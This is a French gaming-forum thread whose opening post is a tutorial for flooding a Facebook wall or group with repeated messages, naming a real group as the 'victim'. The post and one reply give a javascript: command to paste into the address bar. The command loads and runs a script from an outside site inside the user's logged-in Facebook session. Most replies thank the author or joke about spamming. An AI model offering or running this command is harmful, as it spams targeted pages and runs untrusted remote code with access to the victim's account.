• Envoi de vidéos pour la RealityGamingTV

Salut Visiteur ! Tu as vécu recemment un moment insolite dans un jeu vidéo ?
    Tu peux nous envoyer ton clip insolite pour notre chaine YouTube qu'est RealityGamingTV que ce soit un fail, un win ou un kill épique, nous récupérons plusieurs clips afin d'en faire une compilation.
    Seule la communauté peut nous aider à faire vivre la chaine YouTube !

Envoyer une vidéo

YOUPASS - convertir le crédit téléphonique en monnaie ! : Partenaire RealityGaming.fr

Tutoriel [Tuto] Flooder un mur Facebook

Statut
N'est pas ouverte pour d'autres réponses.
Inscrit
19 Décembre 2011
J'aime
38
Réponse de OpenYourEyes™ Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #1
Bonsoir , je vais vous apprendre a FLOODER UN MUR FACEBOOK :) .

Déjà il vous faut ce fameux Java lien pour DL :
Vous devez vous inscrire pour voir les liens !

Avoir le moteur de recherche "Opera" lien pour DL :
Vous devez vous inscrire pour voir les liens !

J'ai tester sur le moteur de recherche "Mozilla Firefox" et sur le moteur de recherche "Google Chrome" sa ne marche PAS .

Ensuite cliquer sur un des profils ou un groupe Facebook je vais prendre comme VICTIME le fameux groupe : "Le groupe des couches tard" et dans la barre d'URL veuillez copiez ceci : javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0) ensuite tapez "Entrée" une fenêtre vas s'ouvrir comme ceci en vous demandez combien de messages voulez vous mettre ->
proxy.php?image=http%3A%2F%2Fimg11.imageshack.us%2Fimg11%2F8214%2Fnombrei.png&hash=75cb824a6f6b1144323d16927cab5bb4

Après avoir cliquer sur "OK" , une nouvelle fenêtre va s'ouvrir en vous demandant quelle message vous voulez envoyer comme ceci ->
proxy.php?image=http%3A%2F%2Fimg39.imageshack.us%2Fimg39%2F7864%2Fmessagen.png&hash=8ff3a3f3ce6b44ecc84c437ae2a3491a

Ensuite cliquer sur "OK" et attendre un peux après avoir cliquer sur "OK" attendez à peux prés 10 secondes clique droit et "RECHARGEZ" vous aurez le nombre de message sur le mur de la personne ou du groupe :) , j'ai pas pus vous faire montrer le FLOOD sur le mur car je suis BLOQUER je me suis amusez avant pour FLOODER des murs donc n'en faites pas TROP !
ENJOY :)

UN PETIT MERCI SERAIT TRÈS SYMPA DE VOTRE PART ! .

Tregow

Bonjour, Bonsoir.
Ancien staff
Inscrit
7 Décembre 2011
J'aime
1 129
Réponse de Tregow Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #2
Over Shoot en a créé un pas mal aussi :ok:

Iz Shear

Blazé de RGFR
Inscrit
18 Février 2012
J'aime
40
Réponse de Iz Shear Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #3
Ah ! Pas mal ça ^^

Inscrit
20 Décembre 2011
J'aime
17
Réponse de StreetMath Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #4
Overshoot l'a repris et à modifier les titres...

Je ne crois pas que ce soit réellement lui qui l'ai fait..

Inscrit
22 Août 2012
J'aime
0
Réponse de arobaz86 Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #5
le lien d'apéra que tu a cité n'est pas un lien pour telecharger opéra! c'est le logiciel skype qu'on a à la place

oReLiK

♥ Progressive Metal ♥
Premium
Inscrit
28 Mai 2012
J'aime
80
Réponse de oReLiK Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #6
C'est énorme ! :D

Wahibe

W A H i B E 3 8 ! ♥
Premium
Inscrit
26 Mai 2012
J'aime
69
Réponse de Wahibe Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #7
Sa me dique je peut pas publier sa care il contient un lien bloqué . ( avascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0) )

Inscrit
22 Août 2012
J'aime
12
Réponse de -JABBT Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #8
Bon tuto, mais je ne comprends pas l'utilité d'aller flooder une page FB ^^

Ayuu

Legend
Premium
Inscrit
27 Juin 2012
J'aime
21
Réponse de Ayuu Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #9
Merci du partage :)

hyukoh

CS:GO Player
Premium
Inscrit
20 Septembre 2011
J'aime
87
Réponse de hyukoh Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #10
Ahaha ! Je vois déjà les troll qui arrive pour spammer les murs ! Mais sinon , merci du partage. :oui:

MrFailz

Ancien staff
Ancien staff
Inscrit
16 Avril 2012
J'aime
2 433
Réponse de MrFailz Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #11
Merci du partage. :)

Wahibe

W A H i B E 3 8 ! ♥
Premium
Inscrit
26 Mai 2012
J'aime
69
Réponse de Wahibe Forums généraux Informatique ⌨️ Windows : [Tuto] Flooder un mur Facebook #12
Personne peut m'aider nan :p ?

Statut
N'est pas ouverte pour d'autres réponses.

Discussions similaires